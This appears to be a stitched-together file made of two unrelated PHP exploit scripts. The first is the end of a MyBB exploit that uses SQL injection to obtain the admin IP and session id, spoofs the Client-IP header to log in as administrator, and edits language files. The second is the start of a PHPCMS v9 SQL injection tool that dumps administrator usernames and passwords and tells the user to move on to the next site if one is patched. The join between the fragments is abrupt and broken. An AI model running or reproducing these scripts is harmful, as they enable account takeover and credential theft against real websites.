# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
# ip: 127.0.0.1
# dateline: 1175443967
# lastactive: 1175444369
#
# $xpl->addheader('Client-IP','127.0.0.1');
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
#
# I decided to use the solution number 2.
# We can also add an administrator (easily) ... but it's not interesting.
#
print "\nAdmin IP : ";
$ip = sql_inject('ip');
print "\nAdmin sid: ";
$sid = sql_inject('sid');
print "\nTrying to be logged in as administrator";
$xpl->addheader('Client-IP', $ip);
$xpl->get($url . "admin/languages.php?adminsid={$sid}");
# Trying to find the language
if (preg_match('#<input type="hidden" name="lang" value="(\\S*)"#', $xpl->getcontent(), $langmatches)) {
$lang = $langmatches[1];
} else {
$lang = 'english';
}
print "\nLanguage: {$lang}";
# Language configuration
$xpl->get($url . "admin/languages.php?adminsid={$sid}&action=edit&lang={$lang}&editwith=0&file={$filetoed}");
preg_match_all('#name="(.*)">(.*)</textarea>#', $xpl->getcontent(), $name_value);
# We can't use:
# - <? OR <?php
Example: php ' . $argv[0] . ' http://www.waitalone.cn/
+-------------------------------------------------------------+
');
exit;
}
error_reporting(0);
//统计时间
$start_time = func_time();
$phpcmsv9 = $argv[1];
if (substr($phpcmsv9, -1) != '/') {
$phpcmsv9 .= '/';
}
//请先添加cookie
$cookie = 'PHPSESSID=opphk3ors2sf2m1bqg148fmue5';
//核心代码,注入获取管理员账号及密码
$sql_admin = sql_inject();
$count = count($sql_admin);
if ($count != 0) {
echo '恭喜大爷,成功获取到[ ' . $count . ' ]个管理员账号!' . "\n\n";
foreach ($sql_admin as $num => $admin) {
echo '管理员' . ($num + 1) . ' => ' . $admin . PHP_EOL;
}
} else {
exit('杯具了大爷,此站漏洞已经修补,请秒下一个!');
}
//发送数据包函数
function get_data($target)
{
//控制http发包参数
global $cookie;
$opts = array('http' => array('method' => "GET", 'timeout' => 30, 'header' => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0\r\n" . "Cookie: {$cookie}\r\n"));
